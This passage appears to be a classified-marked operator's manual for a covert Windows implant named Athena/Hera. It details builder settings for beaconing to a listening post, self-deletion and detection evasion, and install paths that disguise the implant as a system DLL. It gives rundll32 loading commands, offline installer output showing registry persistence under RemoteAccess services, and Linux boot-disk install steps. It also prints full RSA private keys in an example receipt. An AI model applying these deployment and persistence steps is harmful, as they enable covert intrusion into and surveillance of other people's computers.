default:[en-US,en;q=0.5]
new value:
Beacon - Accept Encoding Header (string)
default:[application/octet-stream]
new value:
Beacon - IE Proxy Address (string)
default:[]
new value:
Beacon - WPAD Proxy Address (string)
default:[]
SECRET//NOFORN
14
SECRET//NOFORN
________________________________________________________________________
new value:
Tasking - Overt State File Path (string)
default:[]
new value:
Tasking - Batch Execution Timeout in seconds (number)
default:[0]
new value:
Tasking - Command Execution Timeout in seconds (number)
default:[0]
new value:
Tasking - Chunk Size - maximum number of bytes in a single block (number)
default:[0]
new value:
Tasking - Max CPU Utilization 0..100 (number)
default:[0]
new value:
Tasking - Max Processing Data Size (number)
default:[50331648]
new value:
Uninstall - Date (YYYY-MM-DDTHH:MM:SS) - UTC
default:[]
new value:
Uninstall - Deadman Delay in seconds (number)
default:[0]
new value:
Uninstall - Beacon failure attempts (number)
default:[0]
new value:
Uninstall - Kill File Path - full file path on target (string)
default:[]
new value:
Install - Target File Name (string)
default:[%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll]
new value:
Install - Data File Name (string)
default:[%SystemRoot%\System32\CodeIntegrity\ras.cache]
new value:
Install - Restart service with Service Control Manager (SCM) (no,yes)
default:[yes]
new value:
[WIZARD COMPLETE]
Figure 11 - (S//NF) Builder Wizard Review
6.4 (U) Configuration
(U) This section contains the steps with detailed instructions/notes for configuring an implant.
Table 7 - (S//NF) Step-By-Step Implant Configuration Instructions
SECRET//NOFORN
15
SECRET//NOFORN
________________________________________________________________________
Action / Help Text
1
2
Notes
Target - Parent ID (4 chars)
default:[RnzI]
new value:
The name used for this group of implants.
Target - Child ID (number - dword)
default:[]
new value:
The optional name of a specific implant known as a
child. This option allows the user to define a
specific implant otherwise the system will use the
first 4 bytes of the mac address or a random
number.
Name – 4 characters in length
Name – dword – default is mac address (4bytes)
3
Target - dynamic data config type
(internal,file,registry)
default:[internal]
new value:
--------------------------------------------------------------------Target - dynamic data config type
(internal,file,registry)
default:[internal]
new value: file
The default location of configuration settings that
change on the target.
internal - 0 - use data file to store config
file - 1 - use external file to store config
registry - 2 - use registry to store config
Default Hives:
HKLM -> HKEY_LOCAL_MACHINE
File - define the full path and file name
NOTE: name can include environment
variables
Examples: c:\temp\a.txt or c:\
%SystemRoot%\a.txt
HKCR -> HKEY_CLASSES_ROOT
HKCC -> HKEY_CURRENT_CONFIG
HKCU -> HKEY_CURRENT_USER
HKUS -> HKEY_USERS
Target - dynamic data config path (file
name or registry value name)
default:[None]
new value: c:\temp\myfile.txt
Example:
HKCU\SOFTWARE\ATHENA
--------------------------------------------------------------------Target - dynamic data config type
(internal,file,registry)
default:[internal]
new value: registry
Registry - define the full path to the
registry value
HKLM -> HKEY_LOCAL_MACHINE
HKCR -> HKEY_CLASSES_ROOT
HKCC -> HKEY_CURRENT_CONFIG
HKCU -> HKEY_CURRENT_USER
HKUS -> HKEY_USERS
Examples:
HKLM\SOFTWARE\Microsoft\Value
4
Target - dynamic data config path (file
name or registry value name)
default:[None]
new value:
HKLM\SOFTWARE\Microsoft\myvalue
Beacon - Interval in seconds (number)
default:[86400]
new value:
or
HKLM\SOFTWARE\Microsoft\ATHENA
The user must enter a subsequent value when
selecting the file or registry option. See example
entries in blue.
The default time between beacons.
Time in seconds
SECRET//NOFORN
16
SECRET//NOFORN
________________________________________________________________________
Action / Help Text
5
Notes
Beacon - Jitter as a percentage of Interval
0..100 (number)
default:[5]
new value:
The default jitter used to randomize the beacon time
based on a percentage of the interval time. (NOTE:
0 disables jitter)
Percentage (0..100)
6
Beacon - Boot Delay in seconds (number)
default:[60]
new value:
The default boot delay for the implant. The amount
of time to wait after a reboot.
Time in seconds
7
Beacon - Hibernation Delay in seconds
(number)
default:[60]
new value:
The default hibernation delay for the implant. The
amount of time to wait before the first beacon will
be processed.
Time in seconds
8
Beacon - Tasking Delay in seconds (number)
default:[60]
new value:
The default tasking delay for all commands
processed.
Time in seconds
9
10
11
12
13
Beacon - Domains (LP Server DNS hostname or
IP Addresses separated by a comma)
default:[None]
new value: abc.com
The default domain name (hostname or IP address)
of the Listening Post to be used for beaconing.
Beacon - Port (number)
default:[443]
new value:
The default port number used to beacon from the
target.
Beacon - Proxy Port NOTE:0=disable (number)
default:[0]
new value:
The default proxy port for processing beacons on
the target.
Beacon - User Agent String (string)
default:[Mozilla/5.0 (Windows NT 6.3;
Trident/7.0; rv:11.0)]
new value:
Beacon - URL Path for LP (string)
default:[/]
new value:
The default user agent string placed in the header
when processing beacons on the target.
Time in seconds
Port number(0..65535)
Port number(0..65535)
String
The default URL path on the server that is used for
processing beacons on the target.
WARNING: This value MUST be in the
DATA_URLS field in the config.json file on the
LP.
String
14
15
Beacon - Accept Header (string)
default:[text/html,application/
xhtml+xml,application/
xml;q=0.9,*/*;q=0.8]
new value:
The default accept header in the packet when
processing beacons on the target.
Beacon - Accept Language Header (string)
default:[en-US,en;q=0.5]
new value:
The default accept language header in the packet
when processing beacons on the target.
String
String
SECRET//NOFORN
17
SECRET//NOFORN
________________________________________________________________________
Action / Help Text
16
Notes
Beacon - Accept Encoding Header (string)
default:[application/octet-stream]
new value:
The default accept encoding header in the packet
when processing beacons on the target.
WARNING: Changing this value may cause
unexpected results when processing data on the
target.
String
17
18
19
Beacon - IE Proxy Address (string)
default:[]
new value:
The default IE Proxy Address used to proxy beacon
communication on the target.
Beacon - WPAD Proxy Address (string)
default:[]
new value:
The default WPAD Proxy Address used to proxy
beacon communication on the target.
Tasking - Overt State File Path (string)
default:[]
new value:
The default overt state file path used to store state
information during processing of commands.
(NOTE: when empty – no state information is
stored on target). This directory will store state
files (random file names) of current processing
information.
String
String
String – full path
20
21
22
23
24
25
26
27
Tasking - Batch Execution Timeout in
seconds (number)
default:[0]
new value:
Tasking - Command Execution Timeout in
seconds (number)
default:[0]
new value:
Tasking - Chunk Size - maximum number of
bytes in a single block (number)
default:[0]
new value:
Tasking - Max CPU Utilization 0..100
(number)
default:[0]
new value:
Tasking - Max Processing Data Size (number)
default:[50331648]
new value:
The default batch execution timeout is used to
cancel processing of long running batches.
Uninstall - Date (YYYY-MM-DDTHH:MM:SS) –
UTC
default:[]
new value:
Uninstall - Deadman Delay in seconds
(number)
default:[0]
new value:
Uninstall - Beacon failure attempts
(number)
default:[0]
new value:
The default time and date of the automatic selfdeletion of the target executable.
Time in seconds
The default command execution timeout is used to
cancel processing of long running commands.
Time in seconds
The default chunk size of a packet sent from the
target to the Listening Post.
Number in bytes
The default maximum CPU utilization used by the
system while processing commands.
Percentage of system usage(0..100)
The default maximum processing data size of the
data to process on target.
Number in bytes
Date (YYYY-MM-DDTHH:MM:SS)
The default delay that the target will self-delete
after not receiving a valid beacon.
Time in seconds
The default number of beacon failure attempts to
force a self-delete of the target executable.
Number
SECRET//NOFORN
18
SECRET//NOFORN
________________________________________________________________________
Action / Help Text
28
29
30
31
Notes
Uninstall - Kill File Path - full file path
on target (string)
default:[]
new value:
The default kill file name that is used to force a
self-delete when the file is present on the target
system.
Install - Target File Name (string)
default:[%SystemRoot%\System32\
Microsoft\Crypto\RAS\
iprcache.dll]
new value:
Install - Data File Name (string)
default:[%SystemRoot%\System32\
CodeIntegrity\ras.cache]
new value:
The default file path used for the host target file.
Install - Restart service with Service
Control Manager (SCM) (no,yes)
default:[yes]
new value:
The option to restart the service after install.
Otherwise, the tool will be installed and will not
start until next reboot or restart of the host service.
File Name
File Name
The default file path used for the data file on the
target system.
File Name
Yes/No
6.5 (U) Output
(U) The Builder produces multiple output components. All receipts will be placed in the receipts
folder. Each build will be in its own directory and contain all target specific files.
6.5.1 (U) Output Receipt File
(S//NF) The Builder outputs an XML receipt file containing all the configuration settings for a
target. The receipt file is required when tasking implants and parsing output from a target. The
receipt file name will include the parent id as well as the child id if one exists (e.g.
test_ABCD0064_receipt.xml). Figure 12 shows an example of the receipt file format.
-----BEGIN PUBLIC KEY----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwJjJBMrqVw3insRnvkGp
b1ySeVzBU2SK38g8i1JpZXELqzNzmrXKjg23A9H24hojPHnANzruDe13qJY+0vpe
wO7wbFWOCr5aJ2ETcDK+N601URMTsjy8k7uNasPtI+ffzuiCHvDYvoLtDORjAy45
zrwoPozzVlX01YEfc3nQMZ7YRmUZxNlkAq5nXoZuUeBzNpzYAEA8h84t2/HpFb+H
+1RYWIf7ZvJTadLHcw+8PsCX06Gr+HZRpi/c9CEakzhVfIwQg4rPuXsMDbP0D38k
IH09oP/yd73EJT4wO6jddtFWvXdOI/HWOcb8GXkpoPmcVP0jeaVOwE1l+nYddAou
DKMzaYivpeHsdsA2RjnwlcIFJKEHmug7ga0+4Xr7PGv/B8tWmCyLJOFnTB3xTiJ6
AQ5+Fgej6I/zg1o9XVs37kNHBdxzkia6XmMapfezKFhL06IQtTzV383IU28bouaC
QamGy009wFs0ZmjKVCxwsJoMNDWx/6iSg4diLu6Ju4jgsolG9SaOXur4pbOg8hFl
z1lvSC5FBD3OekpQNIsfPWslHfNa0Mvw1g+CftEKV1EIwv+KCm0aNzVi3vf+LpHu
jKN9go9oqyHK0UY2G1otCh+UlyLJJ71vHnJZ7jaMQLG3iYKmWN/PYz0svD50cEW9
wK31H27uRLVBZYGQ5815M5cCAwEAAQ==
-----END PUBLIC KEY---------BEGIN RSA PRIVATE KEY----MIIJKAIBAAKCAgEAwJjJBMrqVw3insRnvkGpb1ySeVzBU2SK38g8i1JpZXELqzNz
mrXKjg23A9H24hojPHnANzruDe13qJY+0vpewO7wbFWOCr5aJ2ETcDK+N601URMT
sjy8k7uNasPtI+ffzuiCHvDYvoLtDORjAy45zrwoPozzVlX01YEfc3nQMZ7YRmUZ
xNlkAq5nXoZuUeBzNpzYAEA8h84t2/HpFb+H+1RYWIf7ZvJTadLHcw+8PsCX06Gr
+HZRpi/c9CEakzhVfIwQg4rPuXsMDbP0D38kIH09oP/yd73EJT4wO6jddtFWvXdO
I/HWOcb8GXkpoPmcVP0jeaVOwE1l+nYddAouDKMzaYivpeHsdsA2RjnwlcIFJKEH
mug7ga0+4Xr7PGv/B8tWmCyLJOFnTB3xTiJ6AQ5+Fgej6I/zg1o9XVs37kNHBdxz
kia6XmMapfezKFhL06IQtTzV383IU28bouaCQamGy009wFs0ZmjKVCxwsJoMNDWx
/6iSg4diLu6Ju4jgsolG9SaOXur4pbOg8hFlz1lvSC5FBD3OekpQNIsfPWslHfNa
0Mvw1g+CftEKV1EIwv+KCm0aNzVi3vf+LpHujKN9go9oqyHK0UY2G1otCh+UlyLJ
SECRET//NOFORN
19
SECRET//NOFORN
________________________________________________________________________
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
-----END RSA PRIVATE KEY----10.\STATE_FILES40100000001231%SystemRoot
%\System32\Microsoft\Crypto\RAS\iprcache.dll%SystemRoot%\System32\iprtrmgr.dll%SystemRoot%\System32\codeintegrity\ras.cache00010.3.2.564430Mozilla/5.0 (Windows NT 6.3; Trident/7.0;
rv:11.0)
SECRET//NOFORN
20
SECRET//NOFORN
________________________________________________________________________
5000/octopus/-----BEGIN PUBLIC KEY----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA4GUhkIiQtZTYYGiz3ieh
CyWOHz5KM5YbYrvkASsImNZrPem2jWBsHPBzimnrsziVPezxkRCZORBlMeThJgPA
/RAh1udtKL0x5zW6hrxuibtwW+NJSZpigqVut6gMqrtiCrhtYOp17wq4+xyQtZJ/
D0yl2w8umsFMSLDW35LaS0Lg0CuuvhjanUfW61npOpl1jpfeOEW25b/VYlwrgjcd
NdB48np1fBOe0MZLwuVMhVp2mv05jGjMdaBVwxdOlPt31ryZ/40KlfvucBqURhZp
yTa9VWorCFmTzBq6+7ZZv71PhxqOIm1+5jgROi8U95YnVTlop82mRj5BCmoZNX6p
212ZoG5skRHsMP66ohNK5qyW/qk4CnDxqKQprkdIN7/qKJ+rQ732WY6d3f407nW3
fv01qGb+66J2nIXmkZ2mdE8NIY6FxygfMKkqnMpcNfiILK1VSJYDY/LWTNNdYWnK
Q8gSBmV0klFx7BefANOY6luq0/7LzkcxOYz7AJDwXpCDVx0D/Eyc7X1K8EAX+jUY
iBv/bAjNjH6862DgR16yqzb802P4DzTn2oVVdpg8QOg52Sca7ZrSjpAwFg9zBq7K
U3+2xz7KvyZLxlfkNIpXFQRernuqVlpz057KqeI8KZpBNIlBYbDFAR/8TcXZxvqP
d7Xdpx51gzCsyos/LlB1Mq8CAwEAAQ==
-----END PUBLIC KEY---------BEGIN RSA PRIVATE KEY----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
SECRET//NOFORN
21
SECRET//NOFORN
________________________________________________________________________
9KQOrFATxmyIt0kXbWXQ1yNmRKnybXAWHleAzCj0qrKf7CtdRSPOB7WetwTH5ork
7FYwjPTWEr+hsDZmKXOuU3XvlCByNbKe7M2CilseCcqpzhmQDghH3lIAp+BTkwYL
zD5Z5IakrmXE+NmRafPUUZnEhmi1yNuinPeTlrULBbh3X6W9mvJQcOSFZ4HkaE5W
nFVG1GYYAISzBqgk4aALrupQGzshdQgvEcfOeEZuYUxRaqeQGvZS7z/cDQ/10Z7J
3NN4NMOj7VGMNj/tcW5ScEba5ZbZwnPZWiDChHTblOpkbnLKhb/o1898RFaEryg=
-----END RSA PRIVATE KEY----4D324A24C2EB88548A760390ED9DEAB60xABCD00640test
Figure 12 - (S//NF) Example Receipt File - XML
6.5.1 (U) Output Target Files
(S//NF) The Builder outputs files that are used to manage the target implant. Figure 13 shows
the listing of the files included in a standard target configuration.
│
builder.log
│
test_ABCD0064_receipt.xml
│
├───installer
│
installer_x64.dll
│
installer_x86.dll
│
├───offline
│
├───linux
│
│
functions.sh
│
│
linux.sh
│
│
reged.static
│
│
target_x64.dat
│
│
target_x64.dll
│
│
target_x64.ini
│
│
target_x86.dat
│
│
target_x86.dll
│
│
target_x86.ini
│
│
│
└───windows
│
offline_x64.exe
│
offline_x86.exe
│
target.ini
│
target_x64.dat
│
target_x64.dll
│
target_x86.dat
│
target_x86.dll
│
└───ram_only
ram_only_x64.dll
ram_only_x86.dll
- output log from the Builder
- target receipt file
- NOD spec installation files
- 64 bit installation dll
- 32 bit installation dll
- linux offline installation files
- registry editor
-
windows offline installation files
installer for 64 bit recovery OS
installer for 32 bit recovery OS
configuration for specific implant
- NOD spec ram-only version of Athena
- 64 bit run dll
- 32 bit run dll
Figure 13 - (S//NF) Builder Output Files
Note
(S//NF) Athena's Builder has a --debug option that will build
all the intermediate files and place them in a debug directory
in the Builder output directory.
SECRET//NOFORN
22
SECRET//NOFORN
________________________________________________________________________
7. (U) Implant Installation
7.1 (U) Overt Installation on Disk Mode
(S//NF) Once the target is created with the Builder, the implant can be installed with the Installer
DLL. The specific name can be changed when deploying using a DLL file.
•
Installer_x64.dll – 64 bit installation DLL
•
Installer_x86.dll – 32 bit installation DLL
(S//NF) Another tool is required to load the Installer onto the system. For testing
purposes only, rundll32.exe (with Administrator access) can be used as the loader tool.
However, testing the Installer using rundll32.exe may be flagged by the PSP (see
discussion in Section 10.2).
Usage: rundll32 installer_x64.dll,#2
Note
(S//NF) The Shellterm entry point is at ordinal 1 and the
rundll32 entry point is at ordinal 2.
7.2 (U) Random Access Memory-Only (RAM-Only) Mode
(S//NF) Once the target is created with the Builder, the implant can be run in memory with the
ram_only DLL. The specific name can be changed when deploying via a DLL file.
•
ram_only_x64.dll – 64 bit ram-only DLL
•
ram_only_x86.dll – 32 bit ram-only DLL
(S//NF) Another tool is required to run the RAM-only instance on a system. For testing,
rundll32.exe can be used as the loader tool.
Usage: rundll32 ram_only_x64.dll,#2
7.3
(U) Implant Offline Installation
(S//NF) The Offline Installer sets up Athena/Hera on an unbooted computer and updates the
computer’s registry. The Installer can be run from a remote operating system by using a Linux
boot disk (e.g., Ubuntu v14.04) or a Windows Installation disk and the Recovery Console.
7.3.1 (U) Offline Windows Installation
(S//NF) The Offline Windows Installer requires a Windows distribution that has an active
Recovery Console. The bitness of the Windows distribution does not affect the installation but
the correct version of the Installer must be run in the console -- the Offline Installer version must
match the bitness of the Windows Recovery Console. Either installation will resolve the correct
target installation files.
•
offline_x64.exe – for use with the 64 bit Recovery Console
•
offline_x86.exe – for use with the 32 bit Recovery Console
SECRET//NOFORN
23
SECRET//NOFORN
________________________________________________________________________
>offline_x64.exe
OFFLINE::Dec 21 2015
USAGE: offline
Searching C:
Searching D:
Searching X:
Update options:
1) C:\Windows
2) D:\Window10
(x64)
(x64)
Select instance to update (q or x to quit):2
Processing: D:\Window10 (x64)
>> Reg: SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip
DLLPath -> %SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll
Start -> 0x02
Type -> 0x20
>> Reg: SYSTEM\CurrentControlSet\Services\RasMan
Start -> 0x02
Type -> 0x20
>> Reg: SYSTEM\CurrentControlSet\Services\SstpSvc
Start -> 0x02
Type -> 0x20
>> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dll
Dest: D:\Window10\system32\microsoft\crypto\ras\iprcache.dll
>> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dat
Dest: D:\Window10\system32\codeintegrity\ras.cache
SUCCESS
Figure 14 - (S//NF) Windows Offline Installer
(S//NF)Figure 14 shows the output from an Offline Installer session. The installation script will
scan all mounted disks and determine potential Windows versions. A list will be displayed and
the user can select the specific instance to install.
Note
(S//NF) The offline tool allows alternate paths to be included
on the command line as arguments.
USAGE: offline.exe
7.3.1 (U) Offline Linux Installation
(S//NF) The Offline Linux Installer requires the components and versions listed in Table 8
below. The Ubuntu v14.04 installation media will contain the correct versions of required
software for the offline Linux installation.
SECRET//NOFORN
24
SECRET//NOFORN
________________________________________________________________________
Table 8 - (S//NF) Required Offline Installer Components
Component
Utility
bash
sed
od
reged.static
fdisk
mawk
grep
mount
file
Version
4.3.8 or greater
4.2.2
8.2.1 or greater
0.1 140201(included in the Athena distribution)
2.20.1 or greater
1.3.3 or greater
2.16-1 or greater
2.20.1-5 or greater
1.5.14 or greater
(S//NF) Begin the Linux based offline installation by booting the target with a Linux boot disk
(i.e. Ubuntu installation media). Insert or download the Athena/Hera media. The Athena/Hera
Media should contain two shell scripts (linux.sh, functions.sh) and an INI configuration file
(usually target.ini). Configuration parameters for the target are pulled from the INI file.
(S//NF) Run ./linux.sh . You will be prompted to select any available target windows
partitions. Select the corresponding number as shown in Figure 15. Once you select the
partition, the Windows architecture will be determined via a file utility call and the appropriate
binaries will be deployed. Once installation is successful, restart the target machine.
Figure 15 - (S//NF) Linux Offline Installation
8. (U) Tasker
(S//NF) Some general usage comments are presented below:
•
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
SECRET//NOFORN
25
SECRET//NOFORN
•
•
________________________________________________________________________
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
8.1 (U) Usage
(S//NF) This section contains information for tasking an implant. Figure 16 (below) shows the
command line options for the Tasker.
Warning
(S//NF) Implant tasking may be completed on the low-side;
however, the operator should be aware that cryptographic key
data will be in the clear.
(S//NF) By default, the Tasker allows the Operator to interactively build tasking for an implant
or implant family. Alternatively, the operator can also input tasking via a scripted tasking file.
>python.exe tasker.py -h
usage: tasker.py [-h] [-r RECEIPT] [-s SCRIPT] [-g GENERATE] [-p PRIORITY]
[-x] [-e] [--id ID] [--debug]
Tasker Configuration
optional arguments:
-h, --help
show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename to
be used for processing.
-i SCRIPT, --import SCRIPT
